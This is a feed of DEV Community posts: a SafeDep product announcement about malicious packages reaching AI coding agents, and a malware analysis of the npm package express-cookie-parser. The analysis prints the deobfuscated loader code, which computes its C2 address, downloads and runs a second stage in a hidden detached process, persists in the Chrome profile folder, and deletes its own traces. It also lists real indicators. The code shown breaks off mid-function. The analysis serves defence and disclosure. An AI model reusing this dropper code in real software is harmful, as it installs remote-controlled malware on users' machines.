DEV Community: Abhisek Datta The latest articles on DEV Community by Abhisek Datta (@abhisek). https://dev.to/abhisek https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F258129%2Ff6b408e7-c0c1-4931-ba90-009da5077f05.jpeg DEV Community: Abhisek Datta https://dev.to/abhisek en Real-time Malicious Package Protection for AI Coding Agents Abhisek Datta Mon, 23 Feb 2026 09:07:32 +0000 https://dev.to/abhisek/real-time-malicious-package-protection-for-ai-coding-agents-16on https://dev.to/abhisek/real-time-malicious-package-protection-for-ai-coding-agents-16on <p>Claude Code, Cursor, Codex is the new wave of AI coding agents. They can scaffold projects, write features, and wire up dependencies faster than most of us can read a <code>README.md</code>. They also run npm install without a second thought.</p> <p>That’s where things get interesting. <strong>These agents have zero ability to distinguish a legitimate package from a malicious one</strong>. Unlike first-party code which the agents can review, they have no visibility on the third-party code inherited through open source package dependencies.</p> <p>They will install whatever looks right based on the name, the prompt, and the training data. The attack surface is real. There are real-world examples:</p> <ul> <li> <a href="https://safedep.io/shai-hulud-second-coming-supply-chain-attack" rel="noopener noreferrer">Shai-Hulud 2.0</a>: A self-replicating worm that compromised <code>zapier-sdk</code>, <code>@asyncapi</code>, and <code>posthog</code> packages — over 500 npm packages and 25,000+ repositories affected. The malware propagated via preinstall scripts and harvested cloud credentials.</li> <li> <a href="https://safedep.io/eslint-config-prettier-major-npm-supply-chain-hack" rel="noopener noreferrer">eslint-config-prettier</a>: 30 million weekly downloads. Compromised through a phishing attack on the maintainer's npm account. Six malicious versions published before anyone noticed.</li> <li> <a href="https://safedep.io/nx-build-system-compromise" rel="noopener noreferrer">nx build system</a>: 4.6 million weekly downloads. Credential harvesting via postinstall hooks — the malware executed the moment a developer ran <code>npm install</code>.</li> <li> <a href="https://safedep.io/multiple-npm-packages-compromised-billion-downloads" rel="noopener noreferrer">21 npm packages with crypto wallet drainers</a>: Packages with over a billion cumulative weekly downloads, weaponized to steal cryptocurrency.</li> </ul> <h2> Introducing SafeDep MCP </h2> <p>SafeDep MCP Server protect AI coding workflows from software supply chain attacks. Every npm, PyPI, and other open source package is checked against real-time threat intelligence before installation.</p> <p><strong>The problem</strong>: AI coding tools install packages without the scrutiny a human would apply. One malicious package can steal AWS keys, GitHub tokens, and API secrets from the environment.</p> <p><strong>The solution</strong>: SafeDep validates every package that the AI suggests within the agent loop before installation. Malicious packages are blocked with clear explanations. Safe packages install invisibly. Zero friction when there's no threat.</p> <h3> Key Features </h3> <ul> <li> <strong>Real-time detection</strong> — SafeDep scan packages as they're published to public open source registries, detecting threats in hours, not days</li> <li> <strong>Zero friction</strong> — Invisible when packages are safe.</li> <li> <strong>Broad ecosystem coverage</strong> — npm, PyPI, and expanding to more registries</li> </ul> <h3> Supported Tools </h3> <ul> <li>Claude Code</li> <li>Cursor</li> <li>Windsurf</li> <li>Zed</li> <li>Gemini CLI</li> <li>OpenAI Codex</li> <li>Any MCP-compatible IDE</li> </ul> <h2> How it works </h2> <p>SafeDep continuously monitors open source package registries such as npm, pypi and more for newly published packages. All packages are analysed using a combination of static code analysis and dynamic behaviour analysis with LLM based contextual classification of behaviour. This enables real-time detection of malicious packages published to the public registries.</p> <p>SafeDep MCP server is wired with this real-time malicious package database to flag supply chain attacks before they are disclosed in the public.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgykogcyo4fx8hmn5hc4s.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgykogcyo4fx8hmn5hc4s.png" alt="SafeDep MCP Demo"></a></p> <h2> Demo </h2> <p> <iframe src="https://www.youtube.com/embed/hlh13152sUk"> </iframe> </p> <h2> Get Started </h2> <ol> <li>Sign-up with <code>app.safedep.io</code> to get API key (free)</li> <li>Connect AI coding agents with SafeDep Streamable HTTP Endpoint</li> <li>Continue coding with agents. No friction. Just in time protection.</li> </ol> <p><strong>Website</strong>: <a href="https://safedep.io/mcp" rel="noopener noreferrer">https://safedep.io/mcp</a><br> <strong>Documentation</strong>: <a href="https://docs.safedep.io/apps/mcp/overview" rel="noopener noreferrer">https://docs.safedep.io/apps/mcp/overview</a></p> webdev security ai programming Malicious npm Package Impersonating Popular Express Cookie Parser Abhisek Datta Tue, 27 May 2025 18:28:40 +0000 https://dev.to/abhisek/malicious-npm-package-impersonating-popular-express-cookie-parser-4ca0 https://dev.to/abhisek/malicious-npm-package-impersonating-popular-express-cookie-parser-4ca0 <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fpet0yf1o3dzfk7jhp6d5.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fpet0yf1o3dzfk7jhp6d5.png" alt="Hero Image" width="800" height="433"></a></p> <p>Originally published in <a href="https://safedep.io/malicious-npm-package-express-cookie-parser/" rel="noopener noreferrer">SafeDep Engineering</a> blog. GitHub project: <a href="https://github.com/safedep/vet" rel="noopener noreferrer">https://github.com/safedep/vet</a></p> <p>We found a malicious npm package <a href="https://platform.safedep.io/community/malysis/01JSGWAWH87QKPKGMRK6Q0R6ZH" rel="noopener noreferrer">express-cookie-parser</a> impersonating the popular Express <a href="https://www.npmjs.com/package/cookie-parser" rel="noopener noreferrer">cookie-parser</a> package. The <code>README.md</code> file for <code>express-cookie-parser</code> is a copy from the <code>cookie-parser</code> package. The malicious payload is in <code>cookie-loader.min.js</code> in the analyzed version <code>1.4.12</code>. This an unique malicious npm sample that does not depend on pre or post install hooks. Instead, the payload is executed when a documented API from the malicious library is used by an affected application.</p> <p>The payload performs the following:</p> <ul> <li>Acts as <code>stage-1</code> or dropper payload for <code>stage-2</code> payload</li> <li>Fetches seed file <code>https://raw.githubusercontent.com/johns92/blog_app/refs/heads/main/server/.env.example</code> </li> <li>Generates a C2 server domain based on hardcoded <code>496AAC7E</code> and SHA256 hash of the seed file</li> <li>The C2 URL is of the format <code>http://${domain}/public/startup.js?ver=1.2&amp;type=module</code> </li> <li>Downloads <code>startup.js</code> from the C2 server and executes it using <code>node</code> executable found on the system</li> <li>Deletes <code>cookie-loader.min.js</code> after execution and re-writes <code>index.js</code> to remove <code>require('./cookie-loader.min')</code> </li> </ul> <p>At the time of writing, the URL <code>https://raw.githubusercontent.com/johns92/blog_app/refs/heads/main/server/.env.example</code> contains the following payload:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>JWT_SECRET= EXPIRATION=9999h PORT=5555 DB_USER=admin DB_PASS=123456 </code></pre> </div> <p>As per our analysis, the SHA256 hash of the above content is used to generate the C2 server domain using a <a href="https://en.wikipedia.org/wiki/Domain_generation_algorithm" rel="noopener noreferrer">Domain Generation Algorithm</a>.</p> <h2> Investigation </h2> <p>We decided to analyze <code>express-cookie-parser@1.4.12</code> closely to identify the malicious behavior. The <code>package.json</code> is the most common attack vector for malicious npm packages as we have seen in <a href="https://dev.tomalysis-evaluation-using-datadog-malicious-packages-dataset">analyzing 5000+ malicious packages</a>. However, for this sample, the <code>package.json</code> appears to be similar to the original <code>cookie-parser</code> package. However, the <code>index.js</code> loads the malicious payload while providing facades for API compatibility.</p> <p>Lets take a look at the <code>index.js</code> file:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="c1">// Loads dependency packages</span> <span class="kd">var</span> <span class="nx">cookie</span> <span class="o">=</span> <span class="nf">require</span><span class="p">(</span><span class="dl">'</span><span class="s1">cookie</span><span class="dl">'</span><span class="p">);</span> <span class="kd">var</span> <span class="nx">signature</span> <span class="o">=</span> <span class="nf">require</span><span class="p">(</span><span class="dl">'</span><span class="s1">cookie-signature</span><span class="dl">'</span><span class="p">);</span> <span class="c1">// Loads the malicious payload</span> <span class="nf">require</span><span class="p">(</span><span class="dl">'</span><span class="s1">./cookie-loader.min</span><span class="dl">'</span><span class="p">);</span> <span class="c1">// [...]</span> <span class="kd">function</span> <span class="nf">cookieParser</span><span class="p">(</span><span class="nx">secret</span><span class="p">,</span> <span class="nx">options</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// Defines the cookieParser function for API compatibility</span> <span class="c1">// [...]</span> <span class="p">}</span> </code></pre> </div> <p>Next we looked at the <code>cookie-loader.min.js</code> file which is the actual malicious payload. However, it was minified and obfuscated to make it harder to read and analyze by humans or static analysis tools.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqodegubf2pymfgmopgd6.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqodegubf2pymfgmopgd6.png" alt="Obfuscated Code" width="800" height="134"></a></p> <p>The <code>cookie-loader.min.js</code> file is a dropper for the <code>startup.js</code> file that is fetched from a remote C2 server generated using a <a href="https://en.wikipedia.org/wiki/Domain_generation_algorithm" rel="noopener noreferrer">Domain Generation Algorithm</a> with a fixed value of <code>496AAC7E</code>.</p> <p>Based on our analysis, <code>cookie-loader.min.js</code> does the following:</p> <ul> <li>Identifies the path of <code>node</code> executable on the system for Windows, Linux and macOS platforms</li> <li>Computes the Google Chrome user data directory path based on the OS for persistence (dropping <code>startup.js</code>)</li> <li>Computes C2 domain using <a href="https://en.wikipedia.org/wiki/Domain_generation_algorithm" rel="noopener noreferrer">Domain Generation Algorithm</a> with a fixed value of <code>496AAC7E</code> and SHA256 hash of the seed file</li> <li>Downloads <code>startup.js</code> from the C2 server and executes it using <code>node</code> executable found on the system</li> <li>Deletes <code>cookie-loader.min.js</code> after execution and re-writes <code>index.js</code> to remove <code>require('./cookie-loader.min')</code> </li> </ul> <p>It also contains code to delete <code>cookie-loader.min.js</code> after execution and remove the reference from <code>index.js</code>. The following code performs this operation:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="kd">function</span> <span class="nf">f</span><span class="p">()</span> <span class="p">{</span> <span class="nx">l</span><span class="p">.</span><span class="nf">unlinkSync</span><span class="p">(</span><span class="nx">__filename</span><span class="p">);</span> <span class="kd">var</span> <span class="nx">e</span><span class="p">,</span> <span class="nx">t</span> <span class="o">=</span> <span class="nx">r</span><span class="p">.</span><span class="nf">join</span><span class="p">(</span><span class="nx">__dirname</span><span class="p">,</span> <span class="dl">'</span><span class="s1">index.js</span><span class="dl">'</span><span class="p">);</span> <span class="nx">l</span><span class="p">.</span><span class="nf">existsSync</span><span class="p">(</span><span class="nx">t</span><span class="p">)</span> <span class="o">&amp;&amp;</span> <span class="p">((</span><span class="nx">e</span> <span class="o">=</span> <span class="nx">l</span><span class="p">.</span><span class="nf">readFileSync</span><span class="p">(</span><span class="nx">t</span><span class="p">).</span><span class="nf">toString</span><span class="p">()),</span> <span class="nx">l</span><span class="p">.</span><span class="nf">writeFileSync</span><span class="p">(</span><span class="nx">t</span><span class="p">,</span> <span class="nx">e</span><span class="p">.</span><span class="nf">replace</span><span class="p">(</span><span class="dl">"</span><span class="s2">require('./cookie-loader.min')</span><span class="dl">"</span><span class="p">,</span> <span class="dl">''</span><span class="p">)));</span> <span class="p">}</span> </code></pre> </div> <h3> Domain Generation Algorithm (DGA) </h3> <p>The C2 server domain is generated using an embedded DGA based on following two parameters</p> <ul> <li>Hardcoded 4 byte XOR key <code>496AAC7E</code> </li> <li>SHA256 hash of the seed file</li> <li>Generate the stage-2 payload URL as <code>http://${generated-domain}/public/startup.js?ver=1.2&amp;type=module</code> </li> </ul> <p>Based on our analysis, the DGA does the following:</p> <ul> <li>XOR each byte of the SHA256 hash of the seed file with the hardcoded key <code>496AAC7E</code>.</li> <li>Convert the 32 byte (XOR'd hash) result to a dotted IP address format</li> </ul> <p>We derived <code>206.214.129.67</code> as the C2 server domain based on SHA256 hash of the seed file <code>https://raw.githubusercontent.com/johns92/blog_app/refs/heads/main/server/.env.example</code> and the key <code>496AAC7E</code>.</p> <p><a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffc67nd7p96d0ab1qrcs7.png" class="article-body-image-wrapper"><img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ffc67nd7p96d0ab1qrcs7.png" alt="IOC" width="800" height="60"></a></p> <p>See the deobfuscated version of the <code>cookie-loader.min.js</code> file for more details.</p> <h2> What to do if you are affected? </h2> <ul> <li>Remove the package using <code>npm remove express-cookie-parser</code> </li> </ul> <p>For critical systems, we recommend that the system should be considered compromised and appropriate incident response process should kick-in.</p> <h2> How can SafeDep help? </h2> <p>Our free and open source tool <a href="https://github.com/safedep/vet" rel="noopener noreferrer">vet</a> is integrated with the SafeDep Cloud Package Scanning Service and can be used to detect malicious packages before they are installed. <a href="https://github.com/safedep/vet-action" rel="noopener noreferrer">vet-action</a> is a GitHub Action that can be used to establish proactive guardrails against malicious open source packages in your GitHub Actions workflows.</p> <h2> Indicator of Compromise (IOC) </h2> <ul> <li>Seed file URL <code>https://raw.githubusercontent.com/johns92/blog_app/refs/heads/main/server/.env.example</code> </li> <li>C2 server domain generation algorithm key <code>496AAC7E</code> </li> <li>C2 server IP <code>206.214.129.67</code> generated by the DGA using SHA256 hash of the seed file and the key <code>496AAC7E</code> </li> </ul> <h3> Deobfuscated <code>cookie-loader.min.js</code> </h3> <p>Following is the deobfuscated version of the <code>cookie-loader.min.js</code> file:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="c1">// Import required Node.js modules</span> <span class="kd">const</span> <span class="p">{</span> <span class="nx">spawn</span><span class="p">,</span> <span class="nx">exec</span> <span class="p">}</span> <span class="o">=</span> <span class="nf">require</span><span class="p">(</span><span class="dl">'</span><span class="s1">child_process</span><span class="dl">'</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">path</span> <span class="o">=</span> <span class="nf">require</span><span class="p">(</span><span class="dl">'</span><span class="s1">path</span><span class="dl">'</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">https</span> <span class="o">=</span> <span class="nf">require</span><span class="p">(</span><span class="dl">'</span><span class="s1">https</span><span class="dl">'</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">http</span> <span class="o">=</span> <span class="nf">require</span><span class="p">(</span><span class="dl">'</span><span class="s1">http</span><span class="dl">'</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">fs</span> <span class="o">=</span> <span class="nf">require</span><span class="p">(</span><span class="dl">'</span><span class="s1">fs</span><span class="dl">'</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">os</span> <span class="o">=</span> <span class="nf">require</span><span class="p">(</span><span class="dl">'</span><span class="s1">os</span><span class="dl">'</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">crypto</span> <span class="o">=</span> <span class="nf">require</span><span class="p">(</span><span class="dl">'</span><span class="s1">crypto</span><span class="dl">'</span><span class="p">);</span> <span class="c1">// Create a SHA-256 hash object for later use</span> <span class="kd">const</span> <span class="nx">sha256Hash</span> <span class="o">=</span> <span class="nx">crypto</span><span class="p">.</span><span class="nf">createHash</span><span class="p">(</span><span class="dl">'</span><span class="s1">sha256</span><span class="dl">'</span><span class="p">);</span> <span class="c1">// Base64 encoded URL for the initial payload</span> <span class="c1">// Decodes to: https://raw.githubusercontent.com/johns92/blog_app/refs/heads/main/server/.env.example</span> <span class="kd">const</span> <span class="nx">encodedUrl</span> <span class="o">=</span> <span class="dl">'</span><span class="s1">aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL2pvaG5zOTIvYmxvZ19hcHAvcmVmcy9oZWFkcy9tYWluL3NlcnZlci8uZW52LmV4YW1wbGU=</span><span class="dl">'</span><span class="p">;</span> <span class="kd">const</span> <span class="nx">decodedUrl</span> <span class="o">=</span> <span class="nf">atob</span><span class="p">(</span><span class="nx">encodedUrl</span><span class="p">);</span> <span class="cm">/** * Gets the path to the node executable on the system based on platform * This ensures the malware can run node processes on any OS */</span> <span class="kd">function</span> <span class="nf">getNodePath</span><span class="p">()</span> <span class="p">{</span> <span class="c1">// For Linux and macOS</span> <span class="k">if </span><span class="p">(</span><span class="nx">os</span><span class="p">.</span><span class="nf">platform</span><span class="p">()</span> <span class="o">===</span> <span class="dl">'</span><span class="s1">linux</span><span class="dl">'</span> <span class="o">||</span> <span class="nx">os</span><span class="p">.</span><span class="nf">platform</span><span class="p">()</span> <span class="o">===</span> <span class="dl">'</span><span class="s1">darwin</span><span class="dl">'</span><span class="p">)</span> <span class="p">{</span> <span class="k">return</span> <span class="k">new</span> <span class="nc">Promise</span><span class="p">((</span><span class="nx">resolve</span><span class="p">,</span> <span class="nx">reject</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="nf">exec</span><span class="p">(</span><span class="dl">'</span><span class="s1">which node</span><span class="dl">'</span><span class="p">,</span> <span class="p">{</span> <span class="na">windowsHide</span><span class="p">:</span> <span class="kc">true</span> <span class="p">},</span> <span class="p">(</span><span class="nx">error</span><span class="p">,</span> <span class="nx">stdout</span><span class="p">,</span> <span class="nx">stderr</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="k">if </span><span class="p">(</span><span class="nx">error</span> <span class="o">||</span> <span class="nx">stderr</span><span class="p">)</span> <span class="p">{</span> <span class="nf">reject</span><span class="p">(</span><span class="dl">'</span><span class="s1">Node.js not found</span><span class="dl">'</span><span class="p">);</span> <span class="p">}</span> <span class="k">else</span> <span class="p">{</span> <span class="nf">resolve</span><span class="p">(</span><span class="nx">stdout</span><span class="p">.</span><span class="nf">trim</span><span class="p">());</span> <span class="p">}</span> <span class="p">});</span> <span class="p">});</span> <span class="p">}</span> <span class="c1">// For Windows</span> <span class="k">else</span> <span class="k">if </span><span class="p">(</span><span class="nx">os</span><span class="p">.</span><span class="nf">platform</span><span class="p">()</span> <span class="o">===</span> <span class="dl">'</span><span class="s1">win32</span><span class="dl">'</span><span class="p">)</span> <span class="p">{</span> <span class="k">return</span> <span class="k">new</span> <span class="nc">Promise</span><span class="p">((</span><span class="nx">resolve</span><span class="p">,</span> <span class="nx">reject</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="nf">exec</span><span class="p">(</span><span class="dl">'</span><span class="s1">where node</span><span class="dl">'</span><span class="p">,</span> <span class="p">{</span> <span class="na">windowsHide</span><span class="p">:</span> <span class="kc">true</span> <span class="p">},</span> <span class="p">(</span><span class="nx">error</span><span class="p">,</span> <span class="nx">stdout</span><span class="p">,</span> <span class="nx">stderr</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="k">if </span><span class="p">(</span><span class="nx">error</span> <span class="o">||</span> <span class="nx">stderr</span><span class="p">)</span> <span class="p">{</span> <span class="nf">callback</span><span class="p">(</span><span class="kc">null</span><span class="p">);</span> <span class="p">}</span> <span class="k">else</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">nodePath</span> <span class="o">=</span> <span class="nx">stdout</span><span class="p">.</span><span class="nf">split</span><span class="p">(</span><span class="dl">'</span><span class="se">\n</span><span class="dl">'</span><span class="p">)[</span><span class="mi">0</span><span class="p">].</span><span class="nf">trim</span><span class="p">();</span> <span class="nf">resolve</span><span class="p">(</span><span class="nx">nodePath</span><span class="p">);</span> <span class="p">}</span> <span class="p">});</span> <span class="p">});</span> <span class="p">}</span> <span class="p">}</span> <span class="cm">/** * Creates a path for the malicious script * Targets Chrome browser directories for persistence and to avoid detection */</span> <span class="kd">let</span> <span class="nx">getScriptPath</span> <span class="o">=</span> <span class="p">()</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="kd">let</span> <span class="nx">browserDataDir</span> <span class="o">=</span> <span class="kc">null</span><span class="p">;</span> <span class="kd">const</span> <span class="nx">homeDir</span> <span class="o">=</span> <span class="nx">os</span><span class="p">.</span><span class="nf">homedir</span><span class="p">();</span> <span class="c1">// First attempt: Target Chrome user data directories based on OS</span> <span class="k">if </span><span class="p">(</span><span class="nx">os</span><span class="p">.</span><span class="nf">platform</span><span class="p">()</span> <span class="o">===</span> <span class="dl">'</span><span class="s1">win32</span><span class="dl">'</span><span class="p">)</span> <span class="p">{</span> <span class="nx">browserDataDir</span> <span class="o">=</span> <span class="nx">path</span><span class="p">.</span><span class="nf">join</span><span class="p">(</span><span class="nx">homeDir</span><span class="p">,</span> <span class="dl">'</span><span class="s1">AppData</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">Local</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">Google</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">Chrome</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">User Data</span><span class="dl">'</span><span class="p">);</span> <span class="p">}</span> <span class="k">else</span> <span class="k">if </span><span class="p">(</span><span class="nx">os</span><span class="p">.</span><span class="nf">platform</span><span class="p">()</span> <span class="o">===</span> <span class="dl">'</span><span class="s1">linux</span><span class="dl">'</span><span class="p">)</span> <span class="p">{</span> <span class="nx">browserDataDir</span> <span class="o">=</span> <span class="nx">path</span><span class="p">.</span><span class="nf">join</span><span class="p">(</span><span class="nx">homeDir</span><span class="p">,</span> <span class="dl">'</span><span class="s1">.config</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">google-chrome</span><span class="dl">'</span><span class="p">);</span> <span class="p">}</span> <span class="k">else</span> <span class="k">if </span><span class="p">(</span><span class="nx">os</span><span class="p">.</span><span class="nf">platform</span><span class="p">()</span> <span class="o">===</span> <span class="dl">'</span><span class="s1">darwin</span><span class="dl">'</span><span class="p">)</span> <span class="p">{</span> <span class="nx">browserDataDir</span> <span class="o">=</span> <span class="nx">path</span><span class="p">.</span><span class="nf">join</span><span class="p">(</span><span class="nx">homeDir</span><span class="p">,</span> <span class="dl">'</span><span class="s1">Library</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">Application Support</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">Google</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">Chrome</span><span class="dl">'</span><span class="p">);</span> <span class="p">}</span> <span class="c1">// Fallback: Use more generic locations if Chrome dirs don't exist</span> <span class="k">if </span><span class="p">(</span><span class="o">!</span><span class="nx">fs</span><span class="p">.</span><span class="nf">existsSync</span><span class="p">(</span><span class="nx">browserDataDir</span><span class="p">))</span> <span class="p">{</span> <span class="k">if </span><span class="p">(</span><span class="nx">os</span><span class="p">.</span><span class="nf">platform</span><span class="p">()</span> <span class="o">===</span> <span class="dl">'</span><span class="s1">win32</span><span class="dl">'</span><span class="p">)</span> <span class="p">{</span> <span class="nx">browserDataDir</span> <span class="o">=</span> <span class="nx">path</span><span class="p">.</span><span class="nf">join</span><span class="p">(</span><span class="nx">homeDir</span><span class="p">,</span> <span class="dl">'</span><span class="s1">AppData</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">Local</span><span class="dl">'</span><span class="p">);</span> <span class="p">}</span> <span class="k">else</span> <span class="k">if </span><span class="p">(</span><span class="nx">os</span><span class="p">.</span><span class="nf">platform</span><span class="p">()</span> <span class="o">===</span> <span class="dl">'</span><span class="s1">linux</span><span class="dl">'</span><span class="p">)</span> <span class="p">{</span> <span class="nx">browserDataDir</span> <span class="o">=</span> <span class="nx">path</span><span class="p">.</span><span class="nf">join</span><span class="p">(</span><span class="nx">homeDir</span><span class="p">,</span> <span class="dl">'</span><span class="s1">.config</span><span class="dl">'</span><span class="p">);</span> <span class="p">}</span> <span class="k">else</span> <span class="k">if </span><span class="p">(</span><span class="nx">os</span><span class="p">.</span><span class="nf">platform</span><span class="p">()</span> <span class="o">===</span> <span class="dl">'</span><span class="s1">darwin</span><span class="dl">'</span><span class="p">)</span> <span class="p">{</span> <span class="nx">browserDataDir</span> <span class="o">=</span> <span class="nx">path</span><span class="p">.</span><span class="nf">join</span><span class="p">(</span><span class="nx">homeDir</span><span class="p">,</span> <span class="dl">'</span><span class="s1">Library</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">Application Support</span><span class="dl">'</span><span class="p">);</span> <span class="p">}</span> <span class="p">}</span> <span class="c1">// Create directory if it doesn't exist</span> <span class="k">if </span><span class="p">(</span><span class="o">!</span><span class="nx">fs</span><span class="p">.</span><span class="nf">existsSync</span><span class="p">(</span><span class="nx">browserDataDir</span><span class="p">))</span> <span class="p">{</span> <span class="nx">fs</span><span class="p">.</span><span class="nf">mkdirSync</span><span class="p">(</span><span class="nx">browserDataDir</span><span class="p">,</span> <span class="p">{</span> <span class="na">recursive</span><span class="p">:</span> <span class="kc">true</span> <span class="p">});</span> <span class="p">}</span> <span class="c1">// Create a Scripts directory in the browser data folder</span> <span class="kd">const</span> <span class="nx">scriptsDir</span> <span class="o">=</span> <span class="nx">path</span><span class="p">.</span><span class="nf">join</span><span class="p">(</span><span class="nx">browserDataDir</span><span class="p">,</span> <span class="dl">'</span><span class="s1">Scripts</span><span class="dl">'</span><span class="p">);</span> <span class="c1">// Create Scripts directory if it doesn't exist</span> <span class="k">if </span><span class="p">(</span><span class="o">!</span><span class="nx">fs</span><span class="p">.</span><span class="nf">existsSync</span><span class="p">(</span><span class="nx">scriptsDir</span><span class="p">))</span> <span class="p">{</span> <span class="nx">fs</span><span class="p">.</span><span class="nf">mkdirSync</span><span class="p">(</span><span class="nx">scriptsDir</span><span class="p">,</span> <span class="p">{</span> <span class="na">recursive</span><span class="p">:</span> <span class="kc">true</span> <span class="p">});</span> <span class="p">}</span> <span class="c1">// Return path for the malware script</span> <span class="kd">const</span> <span class="nx">malwarePath</span> <span class="o">=</span> <span class="nx">path</span><span class="p">.</span><span class="nf">join</span><span class="p">(</span><span class="nx">scriptsDir</span><span class="p">,</span> <span class="dl">'</span><span class="s1">startup.js</span><span class="dl">'</span><span class="p">);</span> <span class="k">return</span> <span class="nx">malwarePath</span><span class="p">;</span> <span class="p">};</span> <span class="cm">/** * Executes a node script in a detached process * This allows the malware to run independently from the parent process */</span> <span class="kd">function</span> <span class="nf">runScript</span><span class="p">(</span><span class="nx">scriptPath</span><span class="p">)</span> <span class="p">{</span> <span class="nf">spawn</span><span class="p">(</span><span class="dl">'</span><span class="s1">node</span><span class="dl">'</span><span class="p">,</span> <span class="p">[</span><span class="nx">scriptPath</span><span class="p">],</span> <span class="p">{</span> <span class="na">detached</span><span class="p">:</span> <span class="kc">true</span><span class="p">,</span> <span class="c1">// Makes process independent from parent</span> <span class="na">stdio</span><span class="p">:</span> <span class="dl">'</span><span class="s1">ignore</span><span class="dl">'</span><span class="p">,</span> <span class="c1">// Prevents any output being shown</span> <span class="na">windowsHide</span><span class="p">:</span> <span class="kc">true</span><span class="p">,</span> <span class="c1">// Prevents window from being shown on Windows</span> <span class="p">}).</span><span class="nf">unref</span><span class="p">();</span> <span class="c1">// Allows parent to exit independently</span> <span class="p">}</span> <span class="cm">/** * Covers tracks by removing the malicious loader and editing the index.js file * This helps avoid detection after the malware has been installed */</span> <span class="kd">function</span> <span class="nf">coverTracks</span><span class="p">()</span> <span class="p">{</span> <span class="c1">// Delete this malicious file</span> <span class="nx">fs</span><span class="p">.</span><span class="nf">unlinkSync</span><span class="p">(</span><span class="nx">__filename</span><span class="p">);</span> <span class="c1">// Remove the require statement from index.js to hide evidence</span> <span class="kd">const</span> <span class="nx">indexPath</span> <span class="o">=</span> <span class="nx">path</span><span class="p">.</span><span class="nf">join</span><span class="p">(</span><span class="nx">__dirname</span><span class="p">,</span> <span class="dl">'</span><span class="s1">index.js</span><span class="dl">'</span><span class="p">);</span> <span class="k">if </span><span class="p">(</span><span class="nx">fs</span><span class="p">.</span><span class="nf">existsSync</span><span class="p">(</span><span class="nx">indexPath</span><span class="p">))</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">indexContent</span> <span class="o">=</span> <span class="nx">fs</span><span class="p">.</span><span class="nf">readFileSync</span><span class="p">(</span><span class="nx">indexPath</span><span class="p">).</span><span class="nf">toString</span><span class="p">();</span> <span class="c1">// Remove the require statement for this malicious module</span> <span class="nx">fs</span><span class="p">.</span><span class="nf">writeFileSync</span><span class="p">(</span><span class="nx">indexPath</span><span class="p">,</span> <span class="nx">indexContent</span><span class="p">.</span><span class="nf">replace</span><span class="p">(</span><span class="dl">"</span><span class="s2">require('./cookie-loader.min')</span><span class="dl">"</span><span class="p">,</span> <span class="dl">''</span><span class="p">));</span> <span class="p">}</span> <span class="p">}</span> <span class="cm">/** * Updates the downloaded script with the absolute path to node * This ensures the script can be executed as a standalone file */</span> <span class="k">async</span> <span class="kd">function</span> <span class="nf">fixNodePath</span><span class="p">(</span><span 